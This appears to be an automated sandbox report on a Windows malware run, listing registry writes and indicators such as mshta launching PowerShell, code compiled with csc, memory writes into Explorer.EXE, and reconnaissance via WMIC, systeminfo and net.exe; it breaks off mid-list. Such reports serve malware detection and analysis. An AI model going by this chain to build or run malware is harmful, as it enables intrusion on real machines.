80000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37b82531-b0bf-420d- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000069b2e98163a7d80169b2e98163a7d80169b2e98163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323963326132353566326566373638363937353036343739303062393965616465386433343430376234306363343932383666333361363765313734633135620000b20009000400efbe03559690035596902e0000000000000000000000000000000000000000000000000097538f00320039006300320061003200350035006600320065006600370036003800360039003700350030003600340037003900300030006200390039006500610064006500380064003300340034003000370062003400300063006300340039003200380036006600330033006100360037006500310037003400630031003500620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32396332613235356632656637363836393735303634373930306239396561646538643334343037623430636334393238366633336136376531373463313562000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3b0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3b0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = e41a908b63a7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000036601c8463a7d80167df968b63a7d80167df968b63a7d80117f519000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000663264393530653135623863383534393739663131343962363866393431636535616336326430396637636238336639346236343862336263623262396464380000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000d62b4a00660032006400390035003000650031003500620038006300380035003400390037003900660031003100340039006200360038006600390034003100630065003500610063003600320064003000390066003700630062003800330066003900340062003600340038006200330062006300620032006200390064006400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66326439353065313562386338353439373966313134396236386639343163653561633632643039663763623833663934623634386233626362326239646438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = 5ae61e8263a7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = 737e398263a7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bfc5aaf5-2e5b-480b- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d5ec228263a7d801d5ec228263a7d801d5ec228263a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000313937626664663938623930663135363830343766353339303231353937643331376564303261373266646130333532636237383736343431333435383737300000b20009000400efbe03559690035596902e000000000000000000000000000000000000000000000000002b195600310039003700620066006400660039003800620039003000660031003500360038003000340037006600350033003900300032003100350039003700640033003100370065006400300032006100370032006600640061003000330035003200630062003700380037003600340034003100330034003500380037003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31393762666466393862393066313536383034376635333930323135393764333137656430326137326664613033353263623738373634343133343538373730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3e0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3e0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 41edf18163a7d801 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- RuntimeBroker.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 4540 regsvr32.exe 4540 regsvr32.exe 4380 powershell.exe 4380 powershell.exe 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3116 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exeExplorer.EXEpid process 4380 powershell.exe 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE 3116 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
powershell.exeExplorer.EXEWMIC.exeRuntimeBroker.exetasklist.exedescription pid process Token: SeDebugPrivilege 4380 powershell.exe Token: SeShutdownPrivilege 3116 Explorer.EXE Token: SeCreatePagefilePrivilege 3116 Explorer.EXE Token: SeIncreaseQuotaPrivilege 4188 WMIC.exe Token: SeSecurityPrivilege 4188 WMIC.exe Token: SeTakeOwnershipPrivilege 4188 WMIC.exe Token: SeLoadDriverPrivilege 4188 WMIC.exe Token: SeSystemProfilePrivilege 4188 WMIC.exe Token: SeSystemtimePrivilege 4188 WMIC.exe Token: SeProfSingleProcessPrivilege 4188 WMIC.exe Token: SeIncBasePriorityPrivilege 4188 WMIC.exe Token: SeCreatePagefilePrivilege 4188 WMIC.exe Token: SeBackupPrivilege 4188 WMIC.exe Token: SeRestorePrivilege 4188 WMIC.exe Token: SeShutdownPrivilege 4188 WMIC.exe Token: SeDebugPrivilege 4188 WMIC.exe Token: SeSystemEnvironmentPrivilege 4188 WMIC.exe Token: SeRemoteShutdownPrivilege 4188 WMIC.exe Token: SeUndockPrivilege 4188 WMIC.exe Token: SeManageVolumePrivilege 4188 WMIC.exe Token: 33 4188 WMIC.exe Token: 34 4188 WMIC.exe Token: 35 4188 WMIC.exe Token: 36 4188 WMIC.exe Token: SeIncreaseQuotaPrivilege 4188 WMIC.exe Token: SeSecurityPrivilege 4188 WMIC.exe Token: SeTakeOwnershipPrivilege 4188 WMIC.exe Token: SeLoadDriverPrivilege 4188 WMIC.exe Token: SeSystemProfilePrivilege 4188 WMIC.exe Token: SeSystemtimePrivilege 4188 WMIC.exe Token: SeProfSingleProcessPrivilege 4188 WMIC.exe Token: SeIncBasePriorityPrivilege 4188 WMIC.exe Token: SeCreatePagefilePrivilege 4188 WMIC.exe Token: SeBackupPrivilege 4188 WMIC.exe Token: SeRestorePrivilege 4188 WMIC.exe Token: SeShutdownPrivilege 4188 WMIC.exe Token: SeDebugPrivilege 4188 WMIC.exe Token: SeSystemEnvironmentPrivilege 4188 WMIC.exe Token: SeRemoteShutdownPrivilege 4188 WMIC.exe Token: SeUndockPrivilege 4188 WMIC.exe Token: SeManageVolumePrivilege 4188 WMIC.exe Token: 33 4188 WMIC.exe Token: 34 4188 WMIC.exe Token: 35 4188 WMIC.exe Token: 36 4188 WMIC.exe Token: SeShutdownPrivilege 3116 Explorer.EXE Token: SeCreatePagefilePrivilege 3116 Explorer.EXE Token: SeShutdownPrivilege 3576 RuntimeBroker.exe Token: SeDebugPrivilege 3224 tasklist.exe Token: SeShutdownPrivilege 3576 RuntimeBroker.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3116 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3256 wrote to memory of 4540 3256 regsvr32.exe regsvr32.exe PID 3256 wrote to memory of 4540 3256 regsvr32.exe regsvr32.exe PID 3256 wrote to memory of 4540 3256 regsvr32.exe regsvr32.exe PID 2952 wrote to memory of 4380 2952 mshta.exe powershell.exe PID 2952 wrote to memory of 4380 2952 mshta.exe powershell.exe PID 4380 wrote to memory of 864 4380 powershell.exe csc.exe PID 4380 wrote to memory of 864 4380 powershell.exe csc.exe PID 864 wrote to memory of 3588 864 csc.exe cvtres.exe PID 864 wrote to memory of 3588 864 csc.exe cvtres.exe PID 4380 wrote to memory of 3228 4380 powershell.exe csc.exe PID 4380 wrote to memory of 3228 4380 powershell.exe csc.exe PID 3228 wrote to memory of 4068 3228 csc.exe cvtres.exe PID 3228 wrote to memory of 4068 3228 csc.exe cvtres.exe PID 4380 wrote to memory of 3116 4380 powershell.exe Explorer.EXE PID 4380 wrote to memory of 3116 4380 powershell.exe Explorer.EXE PID 4380 wrote to memory of 3116 4380 powershell.exe Explorer.EXE PID 4380 wrote to memory of 3116 4380 powershell.exe Explorer.EXE PID 3116 wrote to memory of 3576 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 3576 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 3576 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 3576 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 3828 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 3828 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 3828 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 3828 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 4552 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 4552 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 4552 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 4552 3116 Explorer.EXE RuntimeBroker.exe PID 3116 wrote to memory of 4244 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 4244 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 1740 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 1740 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 1740 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 1740 3116 Explorer.EXE cmd.exe PID 4244 wrote to memory of 4188 4244 cmd.exe WMIC.exe PID 4244 wrote to memory of 4188 4244 cmd.exe WMIC.exe PID 4244 wrote to memory of 2148 4244 cmd.exe more.com PID 4244 wrote to memory of 2148 4244 cmd.exe more.com PID 3116 wrote to memory of 1740 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 1740 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 4344 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 4344 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 4208 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 4208 3116 Explorer.EXE cmd.exe PID 4208 wrote to memory of 3816 4208 cmd.exe systeminfo.exe PID 4208 wrote to memory of 3816 4208 cmd.exe systeminfo.exe PID 3116 wrote to memory of 1092 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 1092 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 832 3116 Explorer.EXE cmd.exe PID 3116 wrote to memory of 832 3116 Explorer.EXE cmd.exe PID 832 wrote to memory of 2152 832 cmd.exe net.exe PID 832 wrote to memory of 2152 832 